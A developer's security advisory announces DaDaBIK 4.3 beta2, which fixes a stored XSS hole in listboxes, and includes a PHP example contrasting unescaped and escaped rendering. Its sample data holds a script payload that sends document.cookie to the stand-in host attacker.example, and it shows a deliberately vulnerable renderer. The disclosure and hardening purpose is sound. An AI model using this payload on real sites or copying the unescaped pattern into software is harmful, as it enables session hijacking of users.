Security Risk, PLEASE UPGRADE!
Posted by Eugenio on 11 Nov 2010
Hi all,
last night I discovered a serious security hole in DaDaBIK, so I decided to immediately release version 4.3 beta2 with the sole purpose of partially fixing it. All the other bug fixes and new features will wait for version 4.3 rc1, which is still expected in one or two weeks.
Here is the problem: if in a DaDaBIK application the insert or edit feature is enabled (for at least one table) and the select_single field type is used (at least once, even in another table), a malicious user with access to the application could in many cases store arbitrary JavaScript in a value that is later rendered in a listbox; that code was then executed in the browser of every other user simply by using the application.
This is a stored cross-site scripting (XSS) attack (http://en.wikipedia.org/wiki/Cross-site_scripting), which in turn can allow unauthorized access to the application by hijacking the session of a logged-in user (http://en.wikipedia.org/wiki/Session_hijacking) and, if the user's web browser contains security holes, even the execution of arbitrary code on the client machine.
The new 4.3 beta2 solves this problem. Even the DaDaBIK demo was affected, and it was actually exploited by a malicious user; it has now been patched.
The same problem can, however, also occur when the insert or edit feature is enabled (for at least one table) and the HTML content type is used, where escaping the output is not an option because the field is meant to contain HTML; at the moment there is no patch for this second scenario, so the HTML content type should be used very carefully, as highlighted in the updated documentation. In the next few days I would like to integrate something like http://htmlpurifier.org so that users can insert HTML text without security problems.
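What the fix in 4.3 beta2 addresses, shown as an added PHP example that is not DaDaBIK's own code: a value saved by one user reaching a listbox unescaped, beside the escaped rendering. The function names, the sample values and the attacker URL are made up for the illustration.

```php
<?php
// Added example, not DaDaBIK code: a stored XSS through a select_single listbox.
// renderSelectVulnerable, renderSelectSafe and esc are hypothetical helper names.

// Constructed sample data: values previously saved through the insert/edit form.
// The third one is what a malicious user could store; it closes the attribute
// and the <option> element and drops a <script> into the page.
$storedValues = array(
    'Milan',
    'Rome',
    '"></option><script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
);

// Vulnerable rendering: stored values are interpolated into the markup verbatim,
// so whatever one user inserted is parsed as HTML by every other user's browser.
function renderSelectVulnerable($name, array $values)
{
    $html = "<select name=\"$name\">\n";
    foreach ($values as $v) {
        $html .= "  <option value=\"$v\">$v</option>\n";
    }
    return $html . "</select>\n";
}

// Hardened rendering: every untrusted string is HTML-escaped on output, in both
// the attribute context (value="...") and the element-content context.
function esc($s)
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function renderSelectSafe($name, array $values)
{
    $html = '<select name="' . esc($name) . "\">\n";
    foreach ($values as $v) {
        $html .= '  <option value="' . esc($v) . '">' . esc($v) . "</option>\n";
    }
    return $html . "</select>\n";
}

// Quick regression check: does the rendered markup still carry a raw <script> tag?
function containsRawScript($html)
{
    return stripos($html, '<script') !== false;
}

echo renderSelectVulnerable('city', $storedValues);
echo renderSelectSafe('city', $storedValues);
var_dump(containsRawScript(renderSelectVulnerable('city', $storedValues)));
var_dump(containsRawScript(renderSelectSafe('city', $storedValues)));
```

Escaping on output is the right fix for the listbox because a select_single value is supposed to be plain text. For the HTML content type the field is meant to contain markup, so the same escaping would defeat the feature; that is why a sanitizer that keeps only an allowlist of tags and attributes, such as HTML Purifier, is the appropriate tool there rather than htmlspecialchars.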
The 4.3 beta2 also fixes another minor GUI bug, as you can read in the changelog.
Ciao,